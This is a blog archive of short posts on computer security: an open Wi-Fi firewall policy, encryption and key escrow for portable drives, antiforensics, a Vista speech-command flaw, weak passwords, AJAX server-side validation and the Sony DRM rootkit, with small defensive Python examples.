He then goes on to explain why it isn't dangerous. I found it from this Techdirt post, but it's really nothing new: I've had an open access point at the Starport ever since I installed it.

It's very simple, really: everything wireless is treated as "outside the firewall" as far as anything inside, on the wired network, is concerned. It's behind a router that blocks outgoing port 25 (SMTP) to make life hard on drive-by spammers; everything else is open going out. Coming in from the big, bad Internet, nothing gets through except http, dns, and ssh. And from there to my wired network nothing gets in except http, dns, ssh, and ipp (so people can print, as long as they know the URL of one of my printers). That's it.
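That zone-based policy is simple enough to sketch as a filtering predicate. This is only an illustration of the rules described above -- the zone names and the idea of expressing it in Python (rather than actual router config) are mine:

```python
# Zones: "inet" (the big, bad Internet), "wifi" (the open access point,
# treated as outside the firewall), "wired" (the trusted wired network).
HTTP, DNS, SSH, IPP, SMTP = 80, 53, 22, 631, 25

# What each outside zone may open toward the wired network.
ALLOWED_IN = {
    ("inet", "wired"): {HTTP, DNS, SSH},        # from the Internet
    ("wifi", "wired"): {HTTP, DNS, SSH, IPP},   # wireless guests can also print
}

def permit(src_zone, dst_zone, dst_port):
    """Return True if a new connection is allowed by the policy."""
    if src_zone == "wifi" and dst_zone == "inet":
        # Guests go out freely -- except port 25, to slow drive-by spammers.
        return dst_port != SMTP
    return dst_port in ALLOWED_IN.get((src_zone, dst_zone), set())

assert permit("wifi", "inet", HTTP)       # guests can browse
assert not permit("wifi", "inet", SMTP)   # but not spam directly
assert permit("wifi", "wired", IPP)       # guests can print
assert not permit("inet", "wired", IPP)   # the Internet can't
```

The point of writing it out: "open wireless" doesn't mean "open network" -- the wireless side gets exactly the same default-deny treatment as the Internet, plus printing.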
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Sentry® Safe | QE5541 FIRE-SAFE® Water Resistant SAFE
The world's first and only fire and water resistant safe that provides USB powered connectivity. Allows users to backup data using their own 2 1/2" storage device. Protects up to 120 CD's and DVD's. Users connect to their laptop or desktop via the external USB port.
$519 and, in my opinion, worth it. They have smaller models as well, all the way down to a little box that only holds a drive and a few CDs.
mdlbear: (mp3-pen)
Portable Devices Pose Growing IT Security Threat
Jeff Moss, organizer of the DefCon hacking convention, said the lack of an industry standard for encrypting data on portable drives is hampering efforts to boost the security of such devices.

“Something definitely needs to be done because these devices definitely get lost or stolen or [are] given to friends,” said Moss.
Gotta watch out for those friends, all right. But "an industry standard for encrypting data on portable drives" isn't the solution. What are you going to do? Hand out a 256-bit key with every device? And what will you store the key on?
Joe Gabanksi, network administrator for the city of Lake Forest, Ill., said municipal IT personnel first noticed a problem with portable devices after distributing removable storage devices to employees about two years ago.

Officials hoped to help employees more easily transport data, but found after a scan of the IT environment that a host of unauthorized devices were also linked to the network. At that point, Gabanksi said, the city’s IT managers realized that the unofficial policy of connectivity-at-will needed to be tightened.

“We found considerably more activity on the network than we had ever anticipated,” he said. “We had the iPod, digital music players [and] universal flash drives. We were shocked to see how much end users had already used them.”

Gabanksi said the discovery spurred concerns over how to monitor and manage data coming in and out of his environment. Thus, the city moved to require that users register any devices they wish to connect to the corporate network.
Well, you can lock down every machine on your network so that it won't boot from removable media, and encrypts everything that it writes to a USB drive or CD-ROM (using some form of obligatory key escrow so that when the machine crashes you don't lose everything it wrote), but that only works within a closed and very tightly-controlled organization where hardly anyone has to share data with anyone else. As soon as you want to hand somebody a batch of files on an encrypted drive, you have to deal with key management.
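The key-escrow half of that scheme is worth a sketch. This is a toy -- I'm using a one-time pad so the example needs nothing beyond the standard library, where a real deployment would use AES with the per-device key wrapped under an organizational escrow key -- but the shape of the problem is the same: the moment the data is encrypted, *somebody* has to hold a recoverable copy of the key.

```python
import secrets

def xor(data: bytes, key: bytes) -> bytes:
    """One-time-pad encrypt/decrypt (demo only; key must match data length)."""
    return bytes(a ^ b for a, b in zip(data, key))

ESCROW = {}  # the organization's escrow store: device id -> data key

def write_encrypted(device_id, plaintext):
    key = secrets.token_bytes(len(plaintext))  # fresh per-device data key
    ESCROW[device_id] = key                    # escrow a copy before writing
    return xor(plaintext, key)

def recover(device_id, ciphertext):
    """After a crash or loss, IT recovers the data from the escrowed key."""
    return xor(ciphertext, ESCROW[device_id])

ct = write_encrypted("usb-0042", b"payroll spreadsheet contents")
assert ct != b"payroll spreadsheet contents"
assert recover("usb-0042", ct) == b"payroll spreadsheet contents"
```

And there's the rub: that `ESCROW` dict works fine inside one tightly-controlled organization, but the instant you hand the encrypted drive to someone outside it, you're back to shipping keys around -- which is exactly the key-management problem the paragraph above ends on.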

It's a tough problem, all right. I really admire that problem. Thoughts?
mdlbear: (hacker glider)

How Online Criminals Make Themselves Tough to Find, Near Impossible to Nab -- Good article on computer forensics and its limitations.

Despite all that, casting doubt over evidence is just a secondary benefit of antiforensics for criminals. Usually cases will never get to the legal phase because antiforensics makes investigations a bad business decision. This is the primary function of antiforensics: Make investigations an exercise in throwing good money after bad. It becomes so costly and time-consuming to figure out what happened, with an increasingly limited chance that figuring it out will be legally useful, that companies abandon investigations and write off their losses. "Business leaders start to say, I can't be paying $400 an hour for forensics that aren't going to get me anything in return," says Liu. "The attackers know this. They contaminate the scene so badly you'd have to spend unbelievable money to unravel it. They make giving up the smartest business decision."

Pretty sobering stuff.

mdlbear: (sureal time)
Vista Speech Command exposes remote exploit | George Ou | ZDNet.com
The latest bit of entertainment from Microsoft is that if you have speech recognition turned on in Vista, your computer will blithely listen to whatever comes out of its own speakers. So you can create a sound file or a movie, put it on a website, and give commands to the computer of anyone stupid enough to be running Vista and speech recognition when they listen to it.

I'm waiting for somebody to combine this with Goodbye-Microsoft.com. There's a song in there somewhere, I fancy.

(From techdirt.com; spotted by [livejournal.com profile] mr_kurt.)
mdlbear: (kill bill)
Vista security spec 'longest suicide note in history'
VISTA'S CONTENT PROTECTION specification could very well constitute the longest suicide note in history, claims a new and detailed report from the University of Auckland in New Zealand.

"Peter Gutmann's report describes the pernicious DRM built into Vista and required by MS for approval of hardware and drivers," said INQ reader Brad Steffler, MD, who brought the report to our attention. "As a physician who uses PCs for image review before I perform surgery, this situation is intolerable. It is also intolerable for me as a medical school professor as I will have to switch to a MAC or a Linux PC. These draconian dicta just might kill the PC as we know it."
The actual report is here; I originally found it on [livejournal.com profile] cryptome.
mdlbear: (hacker glider)

The most common password these days is no longer "password". It's "password1". At least on Myspace. Who says users haven't learned anything? (The second and third most common are "abc123" and "myspace1" respectively.)

The same article notes that a recent study of corporate employees shows their passwords to be better than they were 15 years ago, but not as good as Myspace users.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Good talk in the early afternoon sessions, with the fascinating title "The Madness of AJAX". Some good, scary demos. If you have an AJAX app, make sure you validate data *on the server!!* DO NOT trust the client-side code, even if you think you wrote it. Other client-side processes can change it.
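That warning deserves a concrete sketch: whatever the AJAX front end validates, the server must validate again, because a hostile "client" can skip your JavaScript entirely and POST whatever it likes. The handler and field names below are invented for illustration:

```python
# Minimal server-side re-validation of an AJAX order request.
# Never trust quantities, prices, or totals computed in the browser.
PRICES = {"widget": 250}  # cents; the authoritative server-side catalog

def handle_order(form):
    item = form.get("item")
    if item not in PRICES:
        raise ValueError("unknown item")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity must be an integer")
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    # Recompute the total server-side; ignore any client-supplied "total".
    return {"item": item, "qty": qty, "total_cents": PRICES[item] * qty}

assert handle_order({"item": "widget", "qty": "3"})["total_cents"] == 750
# A tampered client sends its own bargain "total" -- the server ignores it.
assert handle_order({"item": "widget", "qty": "2", "total": "1"})["total_cents"] == 500
```

The client-side checks are still worth having -- for responsiveness and friendly error messages -- but they're UI, not security.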

Security?!

2006-05-17 02:05 am
mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)
Security Absurdity.com > Security Absurdity; The Complete, Unquestionable, And Total Failure of Information Security.

They say if you drop a frog in a pot of boiling water, it will, of course, frantically try to scramble out. But if you place it gently in a pot of tepid water and turn the heat on low, it will float there quite complacently. As you turn up the heat, the frog will sink into a tranquil stupor and before long, with a smile on its face, it will unresistingly allow itself to be boiled to death. The security industry is much like that frog; completely and uncontrollably in disarray -- yet we tolerate it since we are used to it.

It is time to admit what many security professionals already know: We, as security professionals, are drastically failing ourselves, our community and the people we are meant to protect. Too many of our security layers of defense are broken. Security professionals are enjoying a surge in business and growing salaries and that is why we tolerate the dismal situation we are facing. Yet it is our mandate, first and foremost, to protect.

(from [livejournal.com profile] spaf_cerias)

This article falls a little short of the mark, I think. You can avoid almost all security problems by following three simple rules: 1. Don't run Windows. 2. Don't read email in HTML, or any other format than plain text. 3. Don't trust any medium that can be easily tapped, which includes wireless and the Internet.

Much of what's called the "security industry" these days consists of people and companies making money off the fact that people don't follow these rules, rather than fixing the problem. At this point, merely educating the public will probably not be sufficient.

mdlbear: (sony)

on Boing Boing, as usual. One really must be grateful to Sony -- they've done more to discredit DRM than all the rest of us put together. But I'm still going to boycott them!

mdlbear: (sony)

I'm having trouble keeping up, but here's a second installment of BoingBoing's rootkit roundup. And for good measure, here's an analysis piece on Slyck News. Slyck appears to be a file-sharing news site.

Sony-BMG has managed to accomplish in 16 days what bloggers, the Electronic Frontier Foundation, writers, journalists, and niche sites have been working on for years. Sony-BMG has destroyed the music and movie industry's arguments against P2P, and brought mainstream attention and public distaste to the DRM debate.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

In the face of well-deserved adverse publicity over its DRM rootkit, Sony is offering a patch that reveals the hidden files. Of course, you still break your CD drivers if you try to remove it. Here's a reasonably well-balanced article (from the Washington Post).

In response to criticisms that intruders could take such advantage, First4Internet Ltd. -- the British company that developed the software -- will make available on its Web site a software patch that should remove its ability to hide files, chief executive Mathew Gilliat-Smith said.

Russinovich called the offer of a patch "backpedaling and damage control in the face of a public-relations nightmare" and emphasized that users who try to remove the files manually after applying the fix will still ruin their CD-Rom drives.

...

But according to Mikko Hypponen, director of research for Finnish antivirus company F-Secure Corp., users who want to remove the program may not do so directly, but must fill out a form on Sony's Web site, download additional software, wait for a phone call from a technical support specialist, and then download and install yet another program that removes the files.

I'd like to think that what we're seeing is the beginning of a popular revolt against the {music, movie} industry, that would end up with real reforms in the copyright and patent laws. But I don't believe it. Politicians listen to corporations with the money to hire lobbyists; common sense has nothing to do with it. But I do think that we're going to see a two-tiered system, with a small walled ghetto of high volume, high profit, corporate-published works, and a much larger web of freely-traded pro-am and amateur works under licenses like the GPL and Creative Commons.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

F-Secure's description and blog posting. Note that, according to this posting, this is an independent confirmation of Mark Russinovich's analysis that I posted about yesterday and the day before.

(From [livejournal.com profile] autographedcat.)

mdlbear: portrait of me holding a guitar, by Kelly Freas (freas)

Brian Krebs. (From DocBug)

A comment on Krebs' blog post contains a link to Sony Music's feedback form: <www.sonymusic.com/about/feedback.cgi>; so I used it:

I was all set to buy another pair of Sony's excellent MDR 7509 professional headphones. Now that I've learned that Sony CDs install a Windows rootkit when you attempt to play them, I've decided to look for an alternative, from a company that does not illegally install unwanted software on its customers' computers.

And you can forget about selling me music. As an independent singer-songwriter who believes in fair use and the power of word-of-mouth advertising, I will continue to buy my CDs from my fellow musicians, and not from soulless, evil companies like Sony.

mdlbear: the positively imaginary half of a cubic mandelbrot set (Default)

Slashdot and BoingBoing both point to this article dissecting the rootkit that Sony installs in the name of DRM on their recent audio CDs. It hides registry entries and processes, and hooks into drivers and system calls, and creates a hidden directory. It's a rootkit -- one of the nastiest forms of malware out there.

It'll be a cold day in Hell the next time I buy a Sony product. Too bad for them; I was thinking of getting another pair of headphones. Anybody know of something roughly equivalent to the Sony MDR 7509's?

Page generated 2019-02-20 02:59 am
Powered by Dreamwidth Studios